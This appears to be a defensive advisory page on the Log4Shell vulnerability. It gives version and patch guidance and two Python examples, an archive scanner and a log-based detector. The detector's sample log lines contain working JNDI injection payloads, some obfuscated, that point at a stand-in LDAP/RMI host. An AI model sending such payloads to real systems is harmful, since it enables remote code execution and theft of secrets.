Critical vulnerability in Java logging library Log4j

On November 24, 2021, a critical zero-day vulnerability in Log4j was reported to Apache. It was made public on December 10 under the name Log4Shell (CVE-2021-44228); it can be exploited remotely with almost no effort and allows an attacker to execute arbitrary code on the affected system (remote code execution, RCE). Services of Amazon, Apple, Tesla, Twitter, Steam and others were shown to be vulnerable. Due to the ease of exploitation and the severe consequences, the BSI issued its highest warning level, "red", on Saturday, December 11. The warning (2021-549177-1232) was lowered to yellow after 32 days, on January 12, 2022, because, according to the BSI, the situation had eased significantly and a large number of software vendors had released patches or workarounds for their products, although not all of them had.

These risks and safeguards also apply to PCs, notebooks, tablets and smartphones, and more generally to hundreds of millions of IT and IoT devices, whenever software that ships the Log4j library is installed on them. Minecraft with its embedded server is one example; others are Java-based web cams, car navigation systems, set-top boxes, kitchen appliances, white goods, and even parking meters, smart meter gateways and medical devices.

Are you affected?

To check whether your servers are vulnerable, feel free to use our script.

Log4j 2.x before version 2.15.0 (released December 2021) is affected, i.e. 2.0-beta9 up to and including 2.14.1; Log4j 1.x does not contain the JNDI lookup and is not affected by this CVE. Note that 2.15.0 itself turned out to be an incomplete fix (CVE-2021-45046), and further issues were closed in 2.16.0, 2.17.0 and 2.17.1, so a current release is the one to aim for. Many products that bundle Log4j are also vulnerable. A continuously updated list of these can be found here.
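To show what such a check has to look at, here is an added example scanner in Python (it is not the script referenced above, nor code from Apache or the page's authors). It opens each jar, war or ear, reads the log4j-core version from the pom.properties that Maven-built artifacts carry under META-INF, checks whether JndiLookup.class is still present (i.e. whether the class-removal workaround has already been applied), and recurses into nested archives, because Spring Boot fat jars, WARs and EARs hide log4j-core inside other archives. The sample archives produced by build_sample_jar are constructed fixtures that only mimic the layout of log4j-core; the version thresholds are the Apache release numbers.

```python
"""Scan jar/war/ear archives for a Log4Shell-vulnerable log4j-core (added example)."""
import io
import re
import sys
import zipfile
from pathlib import Path

# The class that performs JNDI lookups. Deleting it from log4j-core is the
# workaround Apache recommends when the library itself cannot be updated.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS_RE = re.compile(
    r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

FIXED_44228 = (2, 15, 0)  # first release closing CVE-2021-44228
CURRENT_FIX = (2, 17, 1)  # also closes CVE-2021-45046, -45105 and -44832


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparsable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None


def _walk_archive(zf, path, findings):
    names = zf.namelist()
    version = None
    for name in names:
        if POM_PROPS_RE.search(name):
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_LOOKUP in names
    if version is not None or has_jndi:
        vt = version_tuple(version)
        findings.append({
            "path": path,
            "version": version,
            "jndi_lookup_present": has_jndi,
            # Exploitable only while JndiLookup is present and the version
            # predates 2.15.0; an unknown version is treated as vulnerable.
            "cve_2021_44228": has_jndi and (vt is None or vt < FIXED_44228),
            # Everything below 2.17.1 still needs an update for the follow-up CVEs.
            "update_needed": vt is None or vt < CURRENT_FIX,
        })
    # Fat jars, WARs and EARs carry log4j-core inside other archives.
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                _walk_archive(inner, f"{path}!{name}", findings)


def assess_archive(source, path="<memory>"):
    """source: a filesystem path or the archive's bytes. Returns finding dicts."""
    src = io.BytesIO(source) if isinstance(source, (bytes, bytearray)) else source
    findings = []
    with zipfile.ZipFile(src) as zf:
        _walk_archive(zf, str(path), findings)
    return findings


def scan_tree(root):
    """Walk a directory tree (e.g. /opt or a Tomcat webapps dir) for archives."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                findings.extend(assess_archive(str(p), p))
            except zipfile.BadZipFile:
                pass
    return findings


def build_sample_jar(version, with_jndi_lookup=True, wrap_in_war=False):
    """Constructed fixture mimicking log4j-core's layout; not an Apache artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
            f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # fake class-file bytes
    jar = buf.getvalue()
    if not wrap_in_war:
        return jar
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-%s.jar" % version, jar)
    return outer.getvalue()


if __name__ == "__main__":
    results = (scan_tree(sys.argv[1]) if len(sys.argv) > 1
               else assess_archive(build_sample_jar("2.14.1", wrap_in_war=True), "app.war"))
    for f in results:
        flag = "VULNERABLE" if f["cve_2021_44228"] else ("update" if f["update_needed"] else "ok")
        print(f"{flag:10} {f['path']}  version={f['version']}  JndiLookup={f['jndi_lookup_present']}")
```

Run it with a directory as the only argument to scan real deployments; without an argument it scans the constructed sample WAR. A jar that reports an unknown version but still contains JndiLookup.class (a repackaged or shaded build without Maven metadata) is deliberately flagged as vulnerable, because that is the case a version-only check misses.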

What should you do if you are affected?

  • Patching: Update Log4j to a current release (2.15.0 closes CVE-2021-44228; 2.17.1 also closes the follow-up issues CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832; for Java 7 and Java 6 the corresponding releases are 2.12.4 and 2.3.2), or update the products that use Log4j.
  • Mitigate: If patching is not possible, message lookups can be disabled by setting the system property “log4j2.formatMsgNoLookups” or the environment variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” to “true”. This only works in versions 2.10 to 2.14.1 and was later found to be insufficient in some configurations (CVE-2021-45046). The more robust workaround, for any 2.x version, is to remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar and restart the application.
  • Have you already been attacked? Check whether the vulnerability has already been exploited; the log4shell-detector tool helps by searching log files for “${jndi:” lookups, including obfuscated and URL-encoded variants. Keep in mind that even an attempt that never loads remote code can leak data: the lookup string can embed further lookups such as “${env:...}”, so any secret in the environment of a vulnerable process must be treated as compromised. If you were successfully attacked, the entire system must be forensically examined; critical systems must be taken offline.
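The core of such a log check, as an added example in Python (it approximates the approach of log4shell-detector but is not that tool's code): every line is percent-decoded, nested obfuscation lookups such as “${lower:j}”, “${::-j}” or “${date:'l'}” are collapsed from the inside out, and the result is matched for “${jndi:”. The access-log lines in SAMPLE_LOG are constructed for the demonstration and use documentation IP ranges; the list of obfuscation tricks handled is the common set seen in payloads, not an exhaustive one.

```python
"""Find Log4Shell exploitation attempts in log lines (added example)."""
import re
import sys
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once the obfuscation around it has been collapsed.
JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}?")


def resolve_lookup(body):
    """Return the literal an obfuscating lookup evaluates to, or None to keep it.

    Handles the tricks commonly seen in payloads (the list is not exhaustive):
      ${lower:j} / ${upper:J}     -> j / J
      ${::-j}, ${env:NOPE:-j}     -> j      (default-value syntax)
      ${date:'j'}                 -> j
    A real ${jndi:...} lookup is left as it is so the caller can match it.
    """
    kind, sep, arg = body.partition(":")
    kind = kind.strip().lower()
    if kind == "jndi":
        return None
    if ":-" in body:
        return body.split(":-", 1)[1]
    if sep and kind in ("lower", "upper"):
        return arg
    if sep and kind == "date":
        return arg.strip("'\"")
    return None


def _collapse(match):
    literal = resolve_lookup(match.group(1))
    return match.group(0) if literal is None else literal


def normalize(line, max_rounds=20):
    """Percent-decode, collapse nested lookups inside-out, then lower-case."""
    s = line
    for _ in range(3):            # access logs may be double URL-encoded
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):   # each round resolves one nesting level
        collapsed = INNER_LOOKUP.sub(_collapse, s)
        if collapsed == s:
            break
        s = collapsed
    return s.lower()


def scan_lines(lines):
    """Return (line_number, normalized JNDI lookup) for every suspicious line."""
    hits = []
    for number, raw in enumerate(lines, 1):
        m = JNDI_LOOKUP.search(normalize(raw))
        if m:
            hits.append((number, m.group(0)))
    return hits


# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:21:03:44 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:21:05:02 +0000] "GET /login?user=${${lower:j}ndi:${lower:l}dap://198.51.100.7/x} HTTP/1.1" 404 0',
    '10.0.0.7 - - [10/Dec/2021:21:06:19 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fo%7D HTTP/1.1" 200 9',
    '10.0.0.8 - - [10/Dec/2021:21:07:40 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:${lower:r}mi://198.51.100.7/y}"',
    '10.0.0.9 - - [10/Dec/2021:21:08:01 +0000] "GET /index.html HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '10.0.0.10 - - [10/Dec/2021:21:09:13 +0000] "GET /docs/log4j-jndi-lookup.html HTTP/1.1" 200 4410 "-" "curl/7.79"',
]


if __name__ == "__main__":
    source = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    for number, lookup in scan_lines(source):
        print(f"line {number}: {lookup}")
```

Pass a log file as the only argument to scan it; without one the constructed sample is used. Only the first four sample lines are reported: the last two contain the word jndi but no lookup syntax, which is the distinction a plain grep for "jndi" does not make. The normalized lookup that is returned (host, port and path of the attacker's LDAP or RMI server) is what to pivot on in outbound connection logs when deciding whether the attempt succeeded.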